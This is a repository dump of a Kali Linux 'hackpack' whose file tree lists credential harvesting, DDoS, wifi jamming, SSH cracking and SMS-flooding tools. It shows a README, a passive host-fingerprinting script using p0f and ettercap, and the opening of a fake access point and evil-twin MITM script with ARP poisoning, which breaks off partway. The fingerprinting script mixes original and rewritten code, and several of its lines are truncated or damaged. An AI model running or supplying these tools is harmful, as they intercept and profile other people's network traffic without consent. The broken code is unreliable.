├── README.md
├── hackpack
├── bug.png
├── elisa.png
├── hackpack
│ ├── 40_Cred_Harvester_1.4.sh
│ ├── 70_Passive_Fingerprint_1.2.sh
│ ├── 911_AP.sh
│ ├── AP_fucker.py
│ ├── Find_Hosts.sh
│ ├── MACchanger.sh
│ ├── Recon.sh
│ ├── SQL
│ │ └── autosploit.pl
│ ├── admin.pl
│ ├── ddos
│ │ ├── LRDoS.sh
│ │ ├── slowloris.pl
│ │ └── wifijammer_0.1.sh
│ ├── ejacoolas.sh
│ ├── enum.sh
│ ├── googli.pl
│ ├── ipchecker.sh
│ ├── lbd.sh
│ ├── n1tr0g3n_SSL_BT-5.sh
│ ├── readysethack.py
│ ├── smskiller.sh
│ ├── soundcloud.sh
│ ├── ssh_crack3r.sh
│ ├── ssl_phucker.sh
│ ├── webservmethod.sh
│ ├── wlm
│ └── wpabust.sh
├── install.sh
├── launchers
│ ├── 911-AP.desktop
│ ├── Ghost_Phisher.desktop
│ ├── Recon.desktop
│ ├── admincp.desktop
│ ├── apfucker.desktop
│ ├── autosploit.desktop
│ ├── credhavester.desktop
│ ├── easy-creds.desktop
│ ├── ejacoolas.desktop
│ ├── enum.desktop
│ ├── findhosts.desktop
│ ├── googli.desktop
│ ├── ipchecker.desktop
│ ├── lazykali.desktop
│ ├── lbd.desktop
│ ├── lrdos.desktop
│ ├── macchanger.desktop
│ ├── n1tr0g3n_ssl.desktop
│ ├── passivefingerprint.desktop
│ ├── pwnstar.desktop
│ ├── readysethack.desktop
│ ├── recon-ng.desktop
│ ├── slowloris.desktop
│ ├── smskiller.desktop
│ ├── soundcloud.desktop
│ ├── ssh_crack3r..desktop
│ ├── ssl_phucker.desktop
│ ├── subterfuge.desktop
│ ├── webservmethod.desktop
│ ├── wifijammer.desktop
│ ├── wlm.desktop
│ ├── wpabust.desktop
│ └── yamas.desktop
├── lzdatabase.directory
├── lzdos.directory
├── lzhackpack.directory
├── lzhackscripts.directory
├── lzrecon.directory
├── lzsniffspoof.directory
├── lztools.directory
├── lzwireless.directory
└── myhackpack.menu
└── lazykali.sh
/README.md:
--------------------------------------------------------------------------------
1 | This is a collection of scripts to add to kali linux.
2 | It will create a new menu named Hackpack in your applications menu.
3 | It should work on any flavor of Debian, Ubuntu, etc.
4 | But is made mainly for Kali along with lazykali.
5 | This script will also add launchers for various programs installed by lazykali.
6 | Credits to everyone whose scripts are included in here.
7 | ie. n1trog3n, TAPE, em3rgency etc.............. All authors credits are in their various scripts.
8 | None of these scripts have been altered in any way, to my knowledge.
9 |
10 |
11 | if you have any issues with this package please contact me.
12 |
13 | Installation video https://www.youtube.com/watch?v=00Vm2Du8P5I
14 |
--------------------------------------------------------------------------------
/hackpack/bug.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thcbin/Lazykali-and-Hackpack/062be6afe25b55aec260e80c7adc8a3bb47cda3f/hackpack/bug.png
--------------------------------------------------------------------------------
/hackpack/elisa.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thcbin/Lazykali-and-Hackpack/062be6afe25b55aec260e80c7adc8a3bb47cda3f/hackpack/elisa.png
--------------------------------------------------------------------------------
/hackpack/hackpack/70_Passive_Fingerprint_1.2.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | #NAME=Passive Fingerprinting
3 |
4 | # Hax0rBl0x - 70_Passive_Fingerprint.sh
5 | # Copyright (C) 2013 Dopey and ShadowBlade72
6 | # Version 1.2
7 | #
8 | # This program is free software: you can redistribute it and/or modify
9 | # it under the terms of the GNU General Public License as published by
10 | # the Free Software Foundation, either version 3 of the License, or
11 | # (at your option) any later version.
12 | #
13 | # This program is distributed in the hope that it will be useful,
14 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
15 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
16 | # GNU General Public License for more details.
17 | #
18 | # You should have received a copy of the GNU General Public License
19 | # along with this program. If not, see <http://www.gnu.org/licenses/>.
20 |
21 | #### DO NOT EDIT ABOVE THIS LINE ####
22 | #### EDIT USER VARIABLES BELOW THIS LINE ####
23 |
24 | Report_File="$HOME/Passive_Fingerprint_Report_$(date +%d%b%y:%H%M).txt"
25 | Refresh_Time=10 #Recommend 30 seconds for RaspberryPI
26 | Generate_Report_Time=10
27 |
28 | #### EDIT USER VARIABLES ABOVE THIS LINE ####
29 | #### DO NOT EDIT BELOW THIS LINE ####
30 |
# Route Ctrl-C through control_c so background sniffers and scratch files
# are cleaned up before the script exits.
trap control_c SIGINT

# Scratch and log files.
# NOTE(review): all four names are fixed and live in the world-writable /tmp.
# When this script runs with elevated privileges, another local user could
# pre-create one of these paths (for example as a symlink) before the script
# writes to it. A private directory from `mktemp -d` would avoid that, but the
# "previous instance" detection in fnStart_p0f / fnStart_Ettercap matches on
# these exact paths, so the two would have to change together.
Ettercap_Passive_Log="/tmp/.passive_ettercap_data.eci"
Temp_Etterlog_XML="/tmp/.temp_etterlog_output.txt"
Passive_Log_File="/tmp/.p0f_reports.txt"
Temp_Sorted_XML="/tmp/.temp_sorted_XML.txt"

# Per-host result tables and the interface list.
declare -a Wireless_Interface IP_Array App_Array Number_Apps_Array \
  OS_Array Browser_Array Number_Browser_Array Check_App Uptime_Array \
  LastSeen_Array Mac_Array Type_Array Ports_Array Number_Ports_Array \
  Manuf_Array Android_Array

# Timers (epoch seconds) for display refresh, etterlog polling and reporting.
past_display_time=$(date +%s)
next_etterlog_time=$(date +%s)
next_report_time=$(date +%s)

# Counters and "started by this run" flags (SETT = ettercap, SPOF = p0f).
LineNumber=0
LineNumberPOF=0
LineNumberEtt=0
LineNumberPrev=0
ReportsRemaining=0
SETT=0
SPOF=0

# Terminal settings saved so control_c can restore them.
OrigSTTY=$(stty -g)

# Names of every link reported by `ip link show` (not only wireless ones,
# despite the variable name). The unquoted substitution is intentional: word
# splitting strips the leading blank awk leaves in front of each name.
Wireless_Interface=($(ip link show | awk -F: '/^[0-9]/ {print $2}'))
Number_Interfaces="${#Wireless_Interface[@]}"
55 |
56 | #Sanity Checks
# Entry point: verify that p0f and ettercap are available, then either offer
# to install what is missing or continue to the interface prompt.
# Globals: POF (reset here), ETTERCAP (read)
# NOTE(review): POF is reset before the checks but ETTERCAP is not, and the
# installer tail visible further down tests a variable named ETTER. Confirm
# which name fnEttercapCheck actually sets.
fnSanityCheck() {
  POF=0
  clear
  echo -e "Sanity check in progress... "
  fnPOFCheck
  fnEttercapCheck

  # Extend this test with "&& $EXAMPLE -ne 1" for any further dependency.
  if [[ $POF -ne 1 && $ETTERCAP -ne 1 ]]; then
    echo -e "$(tput setaf 2)[+]$(tput sgr0) Sanity check successful. All dependencies found."
    sleep 1
    fnMainMenu
  else
    fnInstallCheck
  fi
}
72 |
73 | fnPOFCheck() {
74 | echo -e "$(tput setaf 2)[+]$(tput sgr0) p0f version check... \c"
75 | p0f -i vercheck > /tmp/.pofcheck 2>&1
76 | eval `cat /tmp/.pofcheck | head -n1 | awk '{for(i=1;i /dev/null 2>&1
119 | echo -e ".\c"
120 | wget lcamtuf.coredump.cx/p0f3/releases/p0f-3.06b.tgz > /dev/null 2>&1
121 | echo -e ".\c"
122 | if [[ ! -e /tmp/p0f-3.06b.tgz ]]; then
123 | echo -e "$(tput setaf 1)Failed! Could not connect to server$(tput sgr0)"
124 | sleep 1
125 | control_c
126 | fi
127 | tar -xvf /tmp/p0f-3.06b.tgz > /dev/null 2>&1
128 | echo -e ".\c"
129 | rm /tmp/p0f-3.06b.tgz > /dev/null 2>&1
130 | echo -e ".\c"
131 | cd /tmp/p0f-3.06b/ > /dev/null 2>&1
132 | echo -e ".\c"
133 | make > /dev/null 2>&1
134 | echo -e ".\c"
135 | mv p0f /usr/sbin/p0f > /dev/null 2>&1
136 | rc=$?
137 | echo -e ".\c"
138 | mv p0f.fp /etc/p0f > /dev/null 2>&1
139 | echo -e ".\c"
140 | cd ~
141 | echo -e ".\c"
142 | rm -R /tmp/p0f-3.06b/ > /dev/null 2>&1
143 | echo -e ".$(tput sgr0)\c"
144 | if [[ $rc -eq 0 ]]; then
145 | echo -e "$(tput setaf 2)Success$(tput sgr0)"
146 | sleep 1
147 | else
148 | echo -e "$(tput setaf 1)Failed!$(tput sgr0)"
149 | sleep 1
150 | fi
151 | fi
152 | if [[ $ETTER -eq 1 ]]; then
153 | echo -e "$(tput setaf 2)\n[+]$(tput sgr0) Installing ettercap... \c"
154 | apt-get install ettercap-graphical >/dev/null 2>&1
155 | rc=$?
156 | echo -e ".\c"
157 | if [[ $rc -eq 0 ]]; then
158 | echo -e "$(tput setaf 2)Success$(tput sgr0)"
159 | sleep 1
160 | else
161 | echo -e "$(tput setaf 1)Failed!$(tput sgr0)"
162 | sleep 1
163 | fi
164 | fi
165 | else
166 | echo -e "$(tput setaf 1)[-]$(tput sgr0) You must be root to install dependances!\n"
167 | control_c
168 | fi
169 | fnSanityCheck
170 | }
171 |
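# SIGINT handler and general exit path: stop the sniffers this run started,
# optionally drain unprocessed p0f lines, write the final report, delete the
# scratch logs, restore the terminal and exit.
# Globals: SPOF, SETT, PIDPOF, PIDETTERCAP, ReportsRemaining (read);
#          Passive_Log_File, Ettercap_Passive_Log, OrigSTTY (read);
#          SelectionInit, Selection, past_display_time (written)
control_c()
{
  local now

  tput sgr0
  clear
  echo -e "Cleaning up! Please wait..."

  # kill -0 asks the kernel whether this exact PID is alive. Grepping `ps -ef`
  # for the bare number also matches any other line that merely contains the
  # same digits (another PID, a PPID, a timestamp).
  if [[ $SPOF -eq 1 && $PIDPOF ]] && kill -0 "$PIDPOF" 2>/dev/null; then
    echo -e "$(tput setaf 2)[+]$(tput sgr0) Killing p0f...\c"
    if kill "$PIDPOF"; then
      echo -e "$(tput setaf 2)Success$(tput sgr0)"
    else
      echo -e "$(tput setaf 1)Failed!$(tput sgr0)"
    fi
  fi

  if [[ $SETT -eq 1 && $PIDETTERCAP ]] && kill -0 "$PIDETTERCAP" 2>/dev/null; then
    echo -e "$(tput setaf 2)[+]$(tput sgr0) Killing ettercap...\c"
    # SIGKILL is kept from the original; it gives ettercap no chance to flush
    # its log or undo any state it changed before it dies.
    if kill -9 "$PIDETTERCAP"; then
      echo -e "$(tput setaf 2)Success$(tput sgr0)"
    else
      echo -e "$(tput setaf 1)Failed!$(tput sgr0)"
    fi
  fi

  if [[ $ReportsRemaining -gt 0 ]]; then
    echo -e "$(tput setaf 1)[-]$(tput sgr0)Unprocessed Reports: $ReportsRemaining... Would you like to process these before exiting? [yes]: \c"
    read -r SelectionInit
    Selection=$(tr '[:upper:]' '[:lower:]' <<<"$SelectionInit")
    # An empty answer counts as "yes".
    if [[ -z $Selection || $Selection == "yes" || $Selection == "y" || $Selection == "ye" ]]; then
      echo -e "$(tput setaf 1)[-]$(tput sgr0)This may take a while... Please be patient."
      # Push the refresh timestamp far into the future so the fnSniff_*
      # loops do not redraw the display while draining the backlog.
      now=$(date +%s)
      past_display_time=$((now + now))
      fnSniff_Etterlog
      fnSniff_POF
    fi
  fi

  echo -e "$(tput setaf 2)[+]$(tput sgr0) Generating final report...\c"
  fnGenerate_Report
  echo -e "$(tput setaf 2)Complete$(tput sgr0)"

  # Only remove logs for sniffers this run started; a reused instance from an
  # earlier run keeps its file.
  if [[ $SPOF -eq 1 && -f $Passive_Log_File ]]; then
    echo -e "$(tput setaf 2)[+]$(tput sgr0) Deleting p0f output file...\c"
    rm -- "$Passive_Log_File"
    echo -e "$(tput setaf 2)Complete$(tput sgr0)"
  fi
  if [[ $SETT -eq 1 && -f $Ettercap_Passive_Log ]]; then
    echo -e "$(tput setaf 2)[+]$(tput sgr0) Deleting Ettercap output file...\c"
    rm -- "$Ettercap_Passive_Log"
    echo -e "$(tput setaf 2)Complete$(tput sgr0)"
  fi

  # The message depends on whether a process named Hax0rBl0x is running.
  if pgrep Hax0rBl0x >/dev/null; then
    echo -e "\n*** Returning to main menu... ***\n"
  else
    echo -e "\n*** Exiting script... ***\n"
  fi

  # OrigSTTY is empty when the script started without a terminal; calling
  # stty with no argument would only print the current settings.
  if [[ -n $OrigSTTY ]]; then
    stty "$OrigSTTY"
  fi
  exit
}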
230 |
# Prompt for a capture interface until the answer matches one of the names in
# Wireless_Interface, then start both sniffers and enter the display loop.
# Globals: Wireless_Interface, Number_Interfaces (read);
#          check, count, Selection, Interface, Source, Current_Network (written)
fnMainMenu()
{
  check=0
  until [[ $check -eq 1 ]]; do
    clear
    echo -e "****************** Passive Fingerprinting Script ******************\n"
    echo -e "Please enter interface: \c"
    read Selection
    if [[ -z "$Selection" ]]; then
      echo "No input. Exiting function."
      sleep 2
      control_c
    fi

    # Accept the answer only on an exact match with an enumerated interface.
    # This allow-list is what keeps arbitrary typed text out of the unquoted
    # $Interface / $Source expansions used on later command lines.
    count=0
    until [[ $count -eq $Number_Interfaces ]]; do
      if [[ "$Selection" != "${Wireless_Interface[$count]}" ]]; then
        ((count++))
        continue
      fi
      check=1
      Interface="$Selection"
      Source="-i $Selection"
      count=$Number_Interfaces
    done

    # Reading from a capture file (Source="-r <file>") is disabled in this
    # version of the script.
    if [[ $check -eq 0 ]]; then
      echo "Error! '$Selection' is not an interface!"
      sleep 3
    fi
  done

  # First three octets of the interface's IPv4 address, taken from ifconfig.
  Current_Network=$(ifconfig $Interface | awk -F ' *|:' '/inet ad*r/{split($4,a,"\\."); printf("%d.%d.%d\n", a[1],a[2],a[3])}')
  fnStart_p0f
  fnStart_Ettercap
  sleep 1
  fnSniff_It
}
276 |
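# Reuse a p0f instance that is already logging to Passive_Log_File, or start
# a new one in the background and record its PID.
# Globals: Passive_Log_File, Source (read); PIDPOF, SPOF (written)
# NOTE(review): Passive_Log_File is a fixed name under /tmp. A file or symlink
# already present at that path is written through as-is, and any process whose
# command line mentions "-o <that path>" is accepted as "our" p0f.
fnStart_p0f()
{
  echo -e "$(tput setaf 2)[+]$(tput sgr0) Checking for previous instances of p0f...\c"
  PIDPOF=$(ps -ef | grep -v grep | grep -v xterm | grep -i p0f \
    | grep -i "\-o $Passive_Log_File" | head -n1 | awk '{ print $2 }')
  if [[ $PIDPOF ]]; then
    echo -e "$(tput setaf 2) found!\n [+]$(tput sgr0) p0f logging is running...\c"
    echo "$(tput setaf 2)Complete$(tput sgr0) [PID: $PIDPOF]"
    if [[ -f $Passive_Log_File ]]; then
      return
    fi
    # Instance found but its log is gone: fall through and start a new one.
    echo -e "$(tput setaf 1)[-]$(tput sgr0) p0f log file not found...\c"
  else
    echo "$(tput setaf 2)None found$(tput sgr0)"
  fi

  echo -e "$(tput setaf 2)[+]$(tput sgr0) Starting p0f in background...\c"
  SPOF=1
  # $Source holds two words ("-i <iface>") and must stay unquoted.
  # shellcheck disable=SC2086
  p0f $Source -f /etc/p0f/p0f.fp -o "$Passive_Log_File" >/dev/null 2>&1 &
  PIDPOF=$!
  sleep 1

  # Check the PID itself. The previous `ps | grep p0f | grep $PID` test could
  # match its own grep process or any line containing the same digits, and so
  # report success after p0f had already exited.
  if kill -0 "$PIDPOF" 2>/dev/null; then
    echo "$(tput setaf 2)Success$(tput sgr0) [PID: $PIDPOF]"
  else
    echo -e "$(tput setaf 1)Failed$(tput sgr0)"
    sleep 3
    control_c
  fi
  sleep 1
}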
306 |
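# Reuse an ettercap instance that is already logging to the expected file, or
# start a new one in the background and record its PID.
# Globals: Ettercap_Passive_Log, Interface (read);
#          EttercapLogClean, PIDETTERCAP, SETT (written)
# NOTE(review): the log path is a fixed name under /tmp; see the same caveat
# on Passive_Log_File in fnStart_p0f.
fnStart_Ettercap()
{
  echo -e "$(tput setaf 2)[+]$(tput sgr0) Checking for previous instances of Ettercap...\c"
  # ettercap is given the log name without ".eci"; the script later reads the
  # ".eci" file, so ettercap presumably appends the suffix itself.
  EttercapLogClean=${Ettercap_Passive_Log//.eci/}
  PIDETTERCAP=$(ps -ef | grep -v grep | grep -v xterm | grep -i "ettercap" \
    | grep -i "\-l $EttercapLogClean" | head -n1 | awk '{ print $2 }')
  if [[ $PIDETTERCAP ]]; then
    echo -e "$(tput setaf 2) found!\n [+]$(tput sgr0) Ettercap logging is running...\c"
    echo "$(tput setaf 2)Complete$(tput sgr0) [PID: $PIDETTERCAP]"
    if [[ -f $Ettercap_Passive_Log ]]; then
      return
    fi
    # Instance found but its log is gone: fall through and start a new one.
    echo -e "$(tput setaf 1)[-]$(tput sgr0) Ettercap log file not found...\c"
  else
    echo "$(tput setaf 2)None found$(tput sgr0)"
  fi

  echo -e "$(tput setaf 2)[+]$(tput sgr0) Starting Ettercap in background...\c"
  SETT=1
  ettercap -TQ -i "$Interface" -u -l "$EttercapLogClean" >/dev/null 2>&1 &
  PIDETTERCAP=$!
  sleep 1

  # Check the PID itself rather than grepping `ps` output for its digits,
  # which can match the grep process or an unrelated line.
  if kill -0 "$PIDETTERCAP" 2>/dev/null; then
    echo "$(tput setaf 2)Success$(tput sgr0) [PID: $PIDETTERCAP]"
  else
    echo -e "$(tput setaf 1)Failed$(tput sgr0)"
    sleep 3
    control_c
  fi
  sleep 1
}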
337 |
# Dump the ettercap log as XML with etterlog, rewrite it so that each
# </host> ends a line, then hand every resulting line to fnParse_Data.
# Globals: Ettercap_Passive_Log, Temp_Etterlog_XML, Temp_Sorted_XML,
#          Refresh_Time (read); LINE, LineNumberEtt, past_display_time (written)
fnSniff_Etterlog()
{
  # Both scratch files use fixed names under /tmp (assigned at file scope).
  # NOTE(review): a pre-existing file or symlink at either path is overwritten
  # by the redirections below; consider a private mktemp directory.
  etterlog -x $Ettercap_Passive_Log > $Temp_Etterlog_XML 2>&1
  # NOTE(review): this Perl one-liner looks damaged in this listing. The
  # join() has no input operand and the capture group is empty, which suggests
  # angle-bracketed text was stripped when the page was rendered. Compare it
  # with the upstream script before relying on it.
  perl -e'$x=join("",);$x=~s/\s*[\r\n]+\s*//gs; $x=~s/^.*?().*?$/$1/i;$x=~s/<\/host>/<\/host>\n/gi;print $x;' <$Temp_Etterlog_XML >$Temp_Sorted_XML
  rm $Temp_Etterlog_XML
  # The unquoted substitution is split by IFS. fnSniff_It sets IFS to newline,
  # so each iteration presumably receives one whole host record.
  for LINE in `cat $Temp_Sorted_XML`; do
    # Redraw the display once Refresh_Time seconds have passed.
    if [[ `date +%s` -gt $(( $past_display_time + ( $Refresh_Time -1 ))) ]]; then
      past_display_time=`date +%s`
      fnStats
      fnDisplay_Info
    fi
    ((LineNumberEtt++))
    fnParse_Data
  done
  rm $Temp_Sorted_XML
}
354 |
# Feed the last ReportsRemaining lines of the p0f log to fnParse_Data,
# refreshing the on-screen table whenever Refresh_Time seconds have passed.
# Globals: Passive_Log_File, Refresh_Time (read);
#          LINE, ReportsRemaining, past_display_time (written)
fnSniff_POF() {
  local refresh_after

  # Splitting of the tail output is governed by IFS (newline once fnSniff_It
  # has run), so LINE holds one log line per iteration.
  for LINE in $(tail -"$ReportsRemaining" "$Passive_Log_File"); do
    refresh_after=$(( past_display_time + (Refresh_Time - 1) ))
    if (( $(date +%s) > refresh_after )); then
      past_display_time=$(date +%s)
      fnStats
      fnDisplay_Info
    fi
    fnParse_Data
    ((ReportsRemaining--))
  done
}
366 |
# Main loop: runs until interrupted, processing new p0f lines on every pass
# and re-reading the ettercap log once its poll time has passed.
# Globals: Ettercap_Passive_Log (read);
#          IFS, LineNumber, next_etterlog_time (written)
fnSniff_It()
{
  fnDisplay_Info
  # From here on, unquoted expansions split on newlines only. The fnSniff_*
  # loops rely on this to receive whole lines.
  IFS=$'\n'
  LineNumber=0
  while true; do
    fnStats
    fnSniff_POF
    [[ -f $Ettercap_Passive_Log ]] || continue
    (( $(date +%s) > next_etterlog_time )) || continue
    # Schedule the next ettercap pass ten seconds out.
    next_etterlog_time=$(( $(date +%s) + 10 ))
    fnSniff_Etterlog
  done
}
381 |
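# Refresh the line counters from the p0f log.
# Globals: Passive_Log_File, LineNumberEtt (read);
#          LineNumberPrev, LineNumberPOF, LineNumber, ReportsRemaining (written)
# ReportsRemaining grows by the number of lines appended since the last call.
fnStats() {
  LineNumberPrev=$LineNumberPOF
  # Count through a quoted redirect. A missing or unreadable log counts as
  # zero lines instead of printing a cat error on every pass of the main loop.
  if [[ -r "$Passive_Log_File" ]]; then
    LineNumberPOF=$(wc -l < "$Passive_Log_File")
  else
    LineNumberPOF=0
  fi
  LineNumber=$((LineNumberPOF + LineNumberEtt))
  ReportsRemaining=$(((LineNumberPOF - LineNumberPrev) + ReportsRemaining))
}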
388 |
389 | fnParse_Data()
390 | {
391 | if [[ -z "$LINE" ]]; then
392 | return;
393 | fi
394 |
395 | #See if data is from etterlog. If so, extract it. Otherwise, pull p0f data
396 | if [[ "$(echo $LINE | awk '{ print $1 }')" == " '{for(i=1;i<=NF;i++) { if($i ~ /host ip=/) { cl=$i; gsub(/.*=|\/.*/,"",cl); } if(i==NF) { printf "export Client=\"%s\"",cl; cl=""; } } }'`
398 | Mac=`echo $LINE | awk -vRS="" '{gsub(/.*/,"");print}' | head -n 1`
399 | Manuf=`echo $LINE | awk -vRS="" '{gsub(/.*/,"");print}' | head -n 1`
400 | Type=`echo $LINE | awk -vRS="" '{gsub(/.*/,"");print}' | head -n 1`
401 | Subject="cli"
402 | eval `echo $LINE | awk -F'[ =<>]' '{ count=0; { printf "declare -a PORTS" } for(i=1;i 10 ]]; then
722 | next_report_time=$((`date +%s` + $Generate_Report_Time))
723 | fnGenerate_Report
724 | fi
725 | }
726 |
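# Write the per-host fingerprint report to Report_File, replacing any earlier
# copy. Hosts are taken from array slots 1..254.
# Globals: Report_File, LineNumber and the *_Array tables (read);
#          count, Timestamp (written)
# The report path is quoted so a $HOME containing blanks no longer produces an
# "ambiguous redirect", and the file is opened once for the whole report.
# Values go through printf '%s', so backslash sequences inside collected
# strings are written literally rather than interpreted as with echo -e.
# NOTE(review): the fields are presumably derived from observed network
# traffic; treat the report as untrusted text when viewing or parsing it.
fnGenerate_Report()
{
  Timestamp=$(date)
  {
    printf '%s\n\n' '-=-=-=-=-=-=-=-=-=-=- Fingerprint Report -=-=-=-=-=-=-=-=-=-=-'
    printf 'Report generated: %s\n' "$Timestamp"
    printf 'Reports scanned: %s\n\n\n' "$LineNumber"

    for ((count = 1; count != 255; count++)); do
      [[ ${IP_Array[$count]} ]] || continue

      # Host line: "<ip> [<mac>]", or "<ip> " when no MAC was recorded.
      printf '%s ' "${IP_Array[$count]}"
      if [[ ${Mac_Array[$count]} ]]; then
        printf '[%s]\n' "${Mac_Array[$count]}"
      else
        printf '\n'
      fi

      if [[ ${OS_Array[$count]} ]]; then
        # NOTE(review): this reads an array named Android, while the array
        # declared at file scope is Android_Array. Confirm which one the
        # parser fills.
        if [[ ${Android[$count]} ]]; then
          printf ' OS: %s (%s)\n' "${OS_Array[$count]}" "${Android[$count]}"
        else
          printf ' OS: %s\n' "${OS_Array[$count]}"
        fi
      fi
      if [[ ${Manuf_Array[$count]} ]]; then
        printf ' Manufacturer: %s\n' "${Manuf_Array[$count]}"
      fi
      if [[ ${Type_Array[$count]} ]]; then
        printf ' Host Type: %s\n' "${Type_Array[$count]}"
      fi
      if [[ ${Browser_Array[$count]} ]]; then
        printf ' Browser(s): %s\n' "${Browser_Array[$count]}"
      fi
      if [[ ${App_Array[$count]} ]]; then
        printf ' Apps(s): %s\n' "${App_Array[$count]}"
      fi
      if [[ ${Ports_Array[$count]} ]]; then
        printf ' Port(s): %s\n' "${Ports_Array[$count]}"
      fi
      if [[ ${Uptime_Array[$count]} ]]; then
        printf ' Uptime: %s\n' "${Uptime_Array[$count]}"
      fi
      printf '\n'
    done

    printf '\nEnd of Report\n'
  } > "$Report_File"
}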
774 | fnSanityCheck
775 |
--------------------------------------------------------------------------------
/hackpack/hackpack/911_AP.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # updated nov 25th
3 | # script coded by em3rgency
4 | # 911_AP version 1.1
5 | # xwininfo -id $(xprop -root | awk '/_NET_ACTIVE_WINDOW\(WINDOW\)/{print $NF}')
6 | # This script creates a FAKE Access Points and loads the tools to enumerate connected clients. And it actually works!
7 | # Also includes workin ARP poisoning features.
8 | # Tested and working on BT5r3, Needs to have version 1.3 of dhcp3-server to work correctly
9 | # DOES NOT WORK with ISC-dhcp-server (YET!)
10 |
11 |
12 | #DEFINED COLOR SETTINGS
13 | RED=$(tput setaf 1 && tput bold)
14 | GREEN=$(tput setaf 2 && tput bold)
15 | STAND=$(tput sgr0)
16 | BLUE=$(tput setaf 6 && tput bold)
17 |
18 | echo ""
19 | echo ""
20 | echo ""
21 | echo $RED" +############################################+"
22 | echo $RED" + em3rgency's Fake AP SSL MITM script +"
23 | echo $RED" + +"
24 | echo $RED" + Version 1.1 +"
25 | echo $RED" + +"
26 | echo $RED" + www.em3rgency.com +"
27 | echo $RED" +############################################+"
28 | echo ""
29 | echo $BLUE" Visit http://www.em3rgency.com for updates to this script. Thanks"
30 | echo ""
31 | echo ""
32 | sleep 3
33 | clear
34 |
35 | echo $BLUE" em3rgency's MITM script Version 1.1 !"
36 | echo
37 | echo $RED" ************************************************";
38 | echo $RED" * 1. Prerequsites and Updates *";
39 | echo $RED" * 2. Run FAKE AP Static *";
40 | echo $RED" * 3. Run EVIL TWIN AP *";
41 | echo $RED" * 4. Run Standard ARP poison *";
42 | echo $RED" * 5. Netdiscover connected clients *";
43 | echo $RED" * 6. EXIT *";
44 | echo $RED" ************************************************";
45 | echo ""
46 |
47 | echo $BLUE" Select Menu Option:"
48 | read menuoption
49 | if [ $menuoption = "1" ]; then
50 | clear
51 | echo ""
52 | echo $RED" **************************************";
53 | echo $RED" * 1. Run apt-get update *";
54 | echo $RED" * 2. Run apt-get upgrade *";
55 | echo $RED" * 3. Distribution upgrade *";
56 | echo $RED" * 4. Edit etter.conf *";
57 | echo $RED" * 5. Edit DHCP tunnel interface *";
58 | echo $RED" * 6. Install Dhcp3-server *";
59 | echo $RED" * 7. Update aircrack-ng *";
60 | echo $RED" * 8. Return to Main Menu *";
61 | echo $RED" **************************************";
62 |
63 |
64 | echo $BLUE" Select Menu Option:"$STAND
65 | read menuoption
66 | if [ $menuoption = "1" ]; then
67 |
68 | #This command will look for any upgrades to your OS distro.
69 | sudo apt-get update
70 | clear
71 | ./911_AP.sh
72 | else
73 |
74 | #This command will look for any upgrades to your OS distro.
75 | if [ $menuoption = "2" ]; then
76 | sudo apt-get upgrade
77 | clear
78 | ./911_AP.sh
79 | else
80 |
81 | #This command will look for any distribution upgrades to your OS distro.
82 | if [ $menuoption = "3" ]; then
83 | sudo apt-get dist-upgrade
84 | clear
85 | ./911_AP.sh
86 | else
87 |
88 | #This command edit etter.conf
89 | if [ $menuoption = "4" ]; then
90 | nano /etc/etter.conf
91 | clear
92 | ./911_AP.sh
93 | else
94 |
95 | #This command will edit your tunnel interface
96 | if [ $menuoption = "5" ]; then
97 | nano /etc/default/dhcp3-server
98 | clear
99 | ./911_AP.sh
100 | else
101 |
102 | #This command will Install DHCP3-server on BT5r3
103 | if [ $menuoption = "6" ]; then
104 | apt-get install dhcp3-server
105 | clear
106 | ./911_AP.sh
107 | else
108 |
109 | #This command will update aircrack-ng to the latest nightly build
110 | if [ $menuoption = "7" ]; then
111 | sudo airodump-ng-oui-update
112 | clear
113 | else
114 | if [ $menuoption = "8" ]; then
115 | ./911_AP.sh
116 | fi
117 | fi
118 | fi
119 | fi
120 | fi
121 | fi
122 | fi
123 | fi
124 | else
125 |
126 | if [ $menuoption = "2" ]; then
127 | #This command will RUN The STATIC FAKE AP attack
128 | sleep 2
129 |
130 | # Configuring your Network interfaces
131 | echo
132 | echo $BLUE" [+] Lets get started shall we [+]"
133 | echo $STAND""
134 | echo ""
135 | route -n -A inet | grep UG
136 | echo ""
137 | echo ""
138 | echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
139 | read -e gatewayip
140 | clear
141 | echo -n "Enter your interface that is connected to the internet, Example eth0: "
142 | read -e internet_interface
143 | clear
144 | echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
145 | read -e fakeap_interface
146 | clear
147 | echo -n "Enter the ESSID you would like your rogue AP to be called: "
148 | read -e ESSID
149 | clear
150 | echo -n "Name the folder you want to save your logs into "
151 | read -e SESSION
152 | #creates session directory
153 | mkdir -p /root/$SESSION
154 | clear
155 |
156 | echo $BLUE" Starting Airmon-ng and creating mon0 interface...."$STAND
157 | airmon-ng start $fakeap_interface
158 | fakeap=$fakeap_interface
159 | fakeap_interface="mon0"
160 | sleep 2
161 | clear
162 |
163 | echo $RED" [##########################################################]"
164 | echo $RED" [+][+][+] Running MITM attack vectors [+][+][+]"
165 | echo $RED" [##########################################################]"
166 | sleep 5
167 | echo ""
168 |
169 | # Dhcpd directory and dhcpd.conf creation
170 | mkdir -p "/var/run/dhcpd"
171 | echo "authoritative;
172 |
173 | default-lease-time 700;
174 | max-lease-time 8000;
175 |
176 | subnet 10.0.0.0 netmask 255.255.255.0 {
177 | option routers 10.0.0.1;
178 | option subnet-mask 255.255.255.0;
179 |
180 | option domain-name "\"$ESSID\"";
181 | option domain-name-servers 10.0.0.1;
182 |
183 | range 10.0.0.30 10.0.0.60;
184 |
185 | }" > /var/run/dhcpd/dhcpd.conf
186 |
187 | # FAKEAP setup
188 | echo $BLUE" Configuring and Starting your FAKE Access Point...."
189 | xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
190 | sleep 3
191 | echo ""
192 |
193 | # Setup your IP Tables
194 | echo $BLUE" Configuring your IP tables...."
195 | ifconfig lo up
196 | ifconfig at0 up &
197 | sleep 1
198 | ifconfig at0 10.0.0.1 netmask 255.255.255.0
199 | ifconfig at0 mtu 1400
